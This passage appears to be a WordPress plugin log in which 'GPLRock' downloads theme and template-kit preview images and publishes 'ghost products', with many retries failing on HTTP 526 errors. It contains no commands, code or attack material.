to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-498af360.jpg [04-Apr-2026 11:25:51 UTC] GPLRock: Using pre-downloaded image for product pajax-tax-advisor-financial-consulting-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-498af360.jpg [04-Apr-2026 11:25:51 UTC] GPLRock: Ghost product published with image - Product ID: pajax-tax-advisor-financial-consulting-elementor-template-kit [04-Apr-2026 11:25:52 UTC] GPLRock: Image downloaded successfully for product paintters-painting-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-be89f090.webp [04-Apr-2026 11:25:52 UTC] GPLRock: Using pre-downloaded image for product paintters-painting-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-be89f090.webp [04-Apr-2026 11:25:52 UTC] GPLRock: Ghost product published with image - Product ID: paintters-painting-service-elementor-template-kit [04-Apr-2026 11:25:54 UTC] GPLRock: Image downloaded successfully for product paintmyride-car-painting-modification-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cac92292.jpg [04-Apr-2026 11:25:54 UTC] GPLRock: Using pre-downloaded image for product paintmyride-car-painting-modification-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cac92292.jpg [04-Apr-2026 11:25:54 UTC] GPLRock: Ghost product published with image - Product ID: paintmyride-car-painting-modification-elementor-template-kit [04-Apr-2026 11:25:56 UTC] GPLRock: Image downloaded successfully for product padora-kindergarten-child-care-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eb18f62b.webp [04-Apr-2026 11:25:56 UTC] GPLRock: Using pre-downloaded image for product padora-kindergarten-child-care-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eb18f62b.webp [04-Apr-2026 11:25:56 UTC] GPLRock: Ghost product published with image - Product ID: padora-kindergarten-child-care-elementor-template-kit [04-Apr-2026 11:25:57 UTC] GPLRock: Image downloaded successfully for product pabrica-engineering-industrial-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c1e2c59b.webp [04-Apr-2026 11:25:57 UTC] GPLRock: Using pre-downloaded image for product pabrica-engineering-industrial-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c1e2c59b.webp [04-Apr-2026 11:25:57 UTC] GPLRock: Ghost product published with image - Product ID: pabrica-engineering-industrial-service-elementor-template-kit [04-Apr-2026 11:25:58 UTC] GPLRock: Image downloaded successfully for product ozod-dark-digital-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7ae988c8.webp [04-Apr-2026 11:25:59 UTC] GPLRock: Using pre-downloaded image for product ozod-dark-digital-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7ae988c8.webp [04-Apr-2026 11:25:59 UTC] GPLRock: Ghost product published with image - Product ID: ozod-dark-digital-agency-elementor-template-kit [04-Apr-2026 11:26:00 UTC] GPLRock: Image downloaded successfully for product ozean-water-sports-surfing-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8fe330fd.jpg [04-Apr-2026 11:26:00 UTC] GPLRock: Using pre-downloaded image for product ozean-water-sports-surfing-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8fe330fd.jpg [04-Apr-2026 11:26:00 UTC] GPLRock: Ghost product published with image - Product ID: ozean-water-sports-surfing-elementor-template-kit [04-Apr-2026 11:26:58 UTC] GPLRock: Image download failed for product kerio-creative-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:27:01 UTC] GPLRock: Image download failed for product kerio-creative-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:27:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kerio---creative-multipurpose-wordpress-theme-32569.webp for product kerio-creative-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:27:03 UTC] GPLRock: Image download failed for product kerio-creative-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:27:05 UTC] GPLRock: Image download failed for product kerio-creative-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:27:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kerio---creative-multipurpose-wordpress-theme-32569.webp for product kerio-creative-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:27:07 UTC] GPLRock WARNING: Image download failed for product kerio-creative-multipurpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/kerio---creative-multipurpose-wordpress-theme-32569.webp [04-Apr-2026 11:27:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kerio-creative-multipurpose-wordpress-theme [04-Apr-2026 11:27:07 UTC] GPLRock: Image download failed for product ginea-furniture-fashion-wordpress-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:27:09 UTC] GPLRock: Image download failed for product ginea-furniture-fashion-wordpress-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:27:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ginea---furniture--fashion-wordpress--woocommerce-theme-9528.webp for product ginea-furniture-fashion-wordpress-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:27:12 UTC] GPLRock: Image download failed for product ginea-furniture-fashion-wordpress-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:27:14 UTC] GPLRock: Image download failed for product ginea-furniture-fashion-wordpress-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:27:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ginea---furniture--fashion-wordpress--woocommerce-theme-9528.webp for product ginea-furniture-fashion-wordpress-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:27:16 UTC] GPLRock WARNING: Image download failed for product ginea-furniture-fashion-wordpress-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/ginea---furniture--fashion-wordpress--woocommerce-theme-9528.webp [04-Apr-2026 11:27:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ginea-furniture-fashion-wordpress-woocommerce-theme [04-Apr-2026 11:27:16 UTC] GPLRock: Image download failed for product lunna-photographer-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:27:18 UTC] GPLRock: Image download failed for product lunna-photographer-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:27:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lunna---photographer-portfolio-wordpress-theme-27314.webp for product lunna-photographer-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:27:20 UTC] GPLRock: Image download failed for product lunna-photographer-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:27:22 UTC] GPLRock: Image download failed for product lunna-photographer-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:27:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lunna---photographer-portfolio-wordpress-theme-27314.webp for product lunna-photographer-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:27:24 UTC] GPLRock WARNING: Image download failed for product lunna-photographer-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/lunna---photographer-portfolio-wordpress-theme-27314.webp [04-Apr-2026 11:27:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lunna-photographer-portfolio-wordpress-theme [04-Apr-2026 11:27:24 UTC] GPLRock: Image download failed for product memoir-tumblog-style-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:27:27 UTC] GPLRock: Image download failed for product memoir-tumblog-style-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:27:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/memoir---tumblog-style-wordpress-theme-32519.webp for product memoir-tumblog-style-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:27:29 UTC] GPLRock: Image download failed for product memoir-tumblog-style-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:27:31 UTC] GPLRock: Image download failed for product memoir-tumblog-style-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:27:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/memoir---tumblog-style-wordpress-theme-32519.webp for product memoir-tumblog-style-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:27:33 UTC] GPLRock WARNING: Image download failed for product memoir-tumblog-style-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/memoir---tumblog-style-wordpress-theme-32519.webp [04-Apr-2026 11:27:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: memoir-tumblog-style-wordpress-theme [04-Apr-2026 11:27:33 UTC] GPLRock: Image download failed for product tolarcek-a-bitcoin-cryptocurrency-wordpress-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:27:35 UTC] GPLRock: Image download failed for product tolarcek-a-bitcoin-cryptocurrency-wordpress-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:27:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tolarcek---a-bitcoin--cryptocurrency-wordpress-blog-theme-7490.webp for product tolarcek-a-bitcoin-cryptocurrency-wordpress-blog-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:27:37 UTC] GPLRock: Image download failed for product tolarcek-a-bitcoin-cryptocurrency-wordpress-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:27:40 UTC] GPLRock: Image download failed for product tolarcek-a-bitcoin-cryptocurrency-wordpress-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:27:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tolarcek---a-bitcoin--cryptocurrency-wordpress-blog-theme-7490.webp for product tolarcek-a-bitcoin-cryptocurrency-wordpress-blog-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:27:42 UTC] GPLRock WARNING: Image download failed for product tolarcek-a-bitcoin-cryptocurrency-wordpress-blog-theme. URL: https://meldwp.com/wp-content/uploads/tolarcek---a-bitcoin--cryptocurrency-wordpress-blog-theme-7490.webp [04-Apr-2026 11:27:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tolarcek-a-bitcoin-cryptocurrency-wordpress-blog-theme [04-Apr-2026 11:27:42 UTC] GPLRock: Image downloaded successfully for product one-wordpress-product-landing-page (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e055071b.webp [04-Apr-2026 11:27:42 UTC] GPLRock: Using pre-downloaded image for product one-wordpress-product-landing-page: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e055071b.webp [04-Apr-2026 11:27:42 UTC] GPLRock: Ghost product published with image - Product ID: one-wordpress-product-landing-page [04-Apr-2026 11:27:42 UTC] GPLRock: Image download failed for product suxnix-health-supplement-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:27:44 UTC] GPLRock: Image download failed for product suxnix-health-supplement-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:27:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/suxnix---health-supplement-wordpress-theme-31793.webp for product suxnix-health-supplement-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:27:46 UTC] GPLRock: Image download failed for product suxnix-health-supplement-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:27:48 UTC] GPLRock: Image download failed for product suxnix-health-supplement-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:27:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/suxnix---health-supplement-wordpress-theme-31793.webp for product suxnix-health-supplement-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:27:50 UTC] GPLRock WARNING: Image download failed for product suxnix-health-supplement-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/suxnix---health-supplement-wordpress-theme-31793.webp [04-Apr-2026 11:27:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: suxnix-health-supplement-wordpress-theme [04-Apr-2026 11:27:51 UTC] GPLRock: Image downloaded successfully for product vethouse-pet-care-veterinary-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0938a715.webp [04-Apr-2026 11:27:51 UTC] GPLRock: Using pre-downloaded image for product vethouse-pet-care-veterinary-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0938a715.webp [04-Apr-2026 11:27:51 UTC] GPLRock: Ghost product published with image - Product ID: vethouse-pet-care-veterinary-theme [04-Apr-2026 11:27:51 UTC] GPLRock: Image download failed for product selo-seo-digital-marketing-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:27:53 UTC] GPLRock: Image download failed for product selo-seo-digital-marketing-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:27:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/selo---seo--digital-marketing-agency-wordpress-theme-8034.webp for product selo-seo-digital-marketing-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:27:55 UTC] GPLRock: Image download failed for product selo-seo-digital-marketing-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:27:57 UTC] GPLRock: Image download failed for product selo-seo-digital-marketing-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:27:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/selo---seo--digital-marketing-agency-wordpress-theme-8034.webp for product selo-seo-digital-marketing-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:27:59 UTC] GPLRock WARNING: Image download failed for product selo-seo-digital-marketing-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/selo---seo--digital-marketing-agency-wordpress-theme-8034.webp [04-Apr-2026 11:27:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: selo-seo-digital-marketing-agency-wordpress-theme [04-Apr-2026 11:28:00 UTC] GPLRock: Image download failed for product cutting-edge-responsive-parallax-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:28:02 UTC] GPLRock: Image download failed for product cutting-edge-responsive-parallax-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:28:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cutting-edge-responsive-parallax-wordpress-theme-10063.webp for product cutting-edge-responsive-parallax-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:28:04 UTC] GPLRock: Image download failed for product cutting-edge-responsive-parallax-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:28:06 UTC] GPLRock: Image download failed for product cutting-edge-responsive-parallax-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:28:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cutting-edge-responsive-parallax-wordpress-theme-10063.webp for product cutting-edge-responsive-parallax-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:28:08 UTC] GPLRock WARNING: Image download failed for product cutting-edge-responsive-parallax-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/cutting-edge-responsive-parallax-wordpress-theme-10063.webp [04-Apr-2026 11:28:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cutting-edge-responsive-parallax-wordpress-theme [04-Apr-2026 11:36:54 UTC] GPLRock: Image download failed for product tracktruck-freight-brokerage-and-logistics-company-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:36:56 UTC] GPLRock: Image download failed for product tracktruck-freight-brokerage-and-logistics-company-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:36:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tracktruck---freight-brokerage-and-logistics-company-wordpress-theme-24597.webp for product tracktruck-freight-brokerage-and-logistics-company-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:36:58 UTC] GPLRock: Image download failed for product tracktruck-freight-brokerage-and-logistics-company-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:37:00 UTC] GPLRock: Image download failed for product tracktruck-freight-brokerage-and-logistics-company-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:37:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tracktruck---freight-brokerage-and-logistics-company-wordpress-theme-24597.webp for product tracktruck-freight-brokerage-and-logistics-company-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:37:02 UTC] GPLRock WARNING: Image download failed for product tracktruck-freight-brokerage-and-logistics-company-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/tracktruck---freight-brokerage-and-logistics-company-wordpress-theme-24597.webp [04-Apr-2026 11:37:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tracktruck-freight-brokerage-and-logistics-company-wordpress-theme [04-Apr-2026 11:37:03 UTC] GPLRock: Image downloaded successfully for product tuulikki-nordic-blog-shop-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-76f7409a.webp [04-Apr-2026 11:37:03 UTC] GPLRock: Using pre-downloaded image for product tuulikki-nordic-blog-shop-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-76f7409a.webp [04-Apr-2026 11:37:03 UTC] GPLRock: Ghost product published with image - Product ID: tuulikki-nordic-blog-shop-wordpress-theme [04-Apr-2026 11:37:03 UTC] GPLRock: Image download failed for product myour-cv-resume-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:37:05 UTC] GPLRock: Image download failed for product myour-cv-resume-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:37:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/myour---cv-resume-wordpress-theme-14704.webp for product myour-cv-resume-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:37:07 UTC] GPLRock: Image download failed for product myour-cv-resume-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:37:09 UTC] GPLRock: Image download failed for product myour-cv-resume-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:37:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/myour---cv-resume-wordpress-theme-14704.webp for product myour-cv-resume-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:37:11 UTC] GPLRock WARNING: Image download failed for product myour-cv-resume-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/myour---cv-resume-wordpress-theme-14704.webp [04-Apr-2026 11:37:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: myour-cv-resume-wordpress-theme [04-Apr-2026 11:37:11 UTC] GPLRock: Image download failed for product ahashop-clothing-fashion-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:37:13 UTC] GPLRock: Image download failed for product ahashop-clothing-fashion-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:37:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ahashop---clothing--fashion-wordpress-theme-14974.webp for product ahashop-clothing-fashion-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:37:16 UTC] GPLRock: Image download failed for product ahashop-clothing-fashion-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:37:18 UTC] GPLRock: Image download failed for product ahashop-clothing-fashion-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:37:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ahashop---clothing--fashion-wordpress-theme-14974.webp for product ahashop-clothing-fashion-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:37:20 UTC] GPLRock WARNING: Image download failed for product ahashop-clothing-fashion-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ahashop---clothing--fashion-wordpress-theme-14974.webp [04-Apr-2026 11:37:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ahashop-clothing-fashion-wordpress-theme [04-Apr-2026 11:37:20 UTC] GPLRock: Image download failed for product educator-education-wordpress-theme-for-university-school (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:37:22 UTC] GPLRock: Image download failed for product educator-education-wordpress-theme-for-university-school (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:37:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/educator---education-wordpress-theme-for-university--school-16446.webp for product educator-education-wordpress-theme-for-university-school after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:37:24 UTC] GPLRock: Image download failed for product educator-education-wordpress-theme-for-university-school (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:37:26 UTC] GPLRock: Image download failed for product educator-education-wordpress-theme-for-university-school (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:37:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/educator---education-wordpress-theme-for-university--school-16446.webp for product educator-education-wordpress-theme-for-university-school after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:37:29 UTC] GPLRock WARNING: Image download failed for product educator-education-wordpress-theme-for-university-school. URL: https://meldwp.com/wp-content/uploads/educator---education-wordpress-theme-for-university--school-16446.webp [04-Apr-2026 11:37:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: educator-education-wordpress-theme-for-university-school [04-Apr-2026 11:37:29 UTC] GPLRock: Image download failed for product talents-model-agency-wordpress-cms-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:37:31 UTC] GPLRock: Image download failed for product talents-model-agency-wordpress-cms-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:37:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/talents---model-agency-wordpress-cms-theme-16214.webp for product talents-model-agency-wordpress-cms-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:37:33 UTC] GPLRock: Image download failed for product talents-model-agency-wordpress-cms-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:37:35 UTC] GPLRock: Image download failed for product talents-model-agency-wordpress-cms-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:37:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/talents---model-agency-wordpress-cms-theme-16214.webp for product talents-model-agency-wordpress-cms-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:37:37 UTC] GPLRock WARNING: Image download failed for product talents-model-agency-wordpress-cms-theme. URL: https://meldwp.com/wp-content/uploads/talents---model-agency-wordpress-cms-theme-16214.webp [04-Apr-2026 11:37:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: talents-model-agency-wordpress-cms-theme [04-Apr-2026 11:37:37 UTC] GPLRock: Image download failed for product magone-responsive-news-magazine-blogger-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:37:40 UTC] GPLRock: Image download failed for product magone-responsive-news-magazine-blogger-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:37:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/magone---responsive-news--magazine-blogger-template-20651.webp for product magone-responsive-news-magazine-blogger-template after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:37:42 UTC] GPLRock: Image download failed for product magone-responsive-news-magazine-blogger-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:37:44 UTC] GPLRock: Image download failed for product magone-responsive-news-magazine-blogger-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:37:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/magone---responsive-news--magazine-blogger-template-20651.webp for product magone-responsive-news-magazine-blogger-template after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:37:46 UTC] GPLRock WARNING: Image download failed for product magone-responsive-news-magazine-blogger-template. URL: https://meldwp.com/wp-content/uploads/magone---responsive-news--magazine-blogger-template-20651.webp [04-Apr-2026 11:37:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: magone-responsive-news-magazine-blogger-template [04-Apr-2026 11:37:46 UTC] GPLRock: Image download failed for product tennis-club-sports-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:37:48 UTC] GPLRock: Image download failed for product tennis-club-sports-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:37:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tennis-club--sports-theme-23981.webp for product tennis-club-sports-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:37:50 UTC] GPLRock: Image download failed for product tennis-club-sports-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:37:53 UTC] GPLRock: Image download failed for product tennis-club-sports-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:37:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tennis-club--sports-theme-23981.webp for product tennis-club-sports-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:37:55 UTC] GPLRock WARNING: Image download failed for product tennis-club-sports-theme. URL: https://meldwp.com/wp-content/uploads/tennis-club--sports-theme-23981.webp [04-Apr-2026 11:37:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tennis-club-sports-theme [04-Apr-2026 11:37:55 UTC] GPLRock: Image download failed for product socialv-50-social-network-community-admin-template-vue-3-react-js-html-bootstrap-5 (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:37:57 UTC] GPLRock: Image download failed for product socialv-50-social-network-community-admin-template-vue-3-react-js-html-bootstrap-5 (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:37:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/socialv-50---social-network--community-admin-template-vue-3-react-js-html-bootst-19863.webp for product socialv-50-social-network-community-admin-template-vue-3-react-js-html-bootstrap-5 after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:37:59 UTC] GPLRock: Image download failed for product socialv-50-social-network-community-admin-template-vue-3-react-js-html-bootstrap-5 (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:38:01 UTC] GPLRock: Image download failed for product socialv-50-social-network-community-admin-template-vue-3-react-js-html-bootstrap-5 (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:38:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/socialv-50---social-network--community-admin-template-vue-3-react-js-html-bootst-19863.webp for product socialv-50-social-network-community-admin-template-vue-3-react-js-html-bootstrap-5 after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:38:03 UTC] GPLRock WARNING: Image download failed for product socialv-50-social-network-community-admin-template-vue-3-react-js-html-bootstrap-5. URL: https://meldwp.com/wp-content/uploads/socialv-50---social-network--community-admin-template-vue-3-react-js-html-bootst-19863.webp [04-Apr-2026 11:38:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: socialv-50-social-network-community-admin-template-vue-3-react-js-html-bootstrap-5 [04-Apr-2026 11:38:03 UTC] GPLRock: Image download failed for product 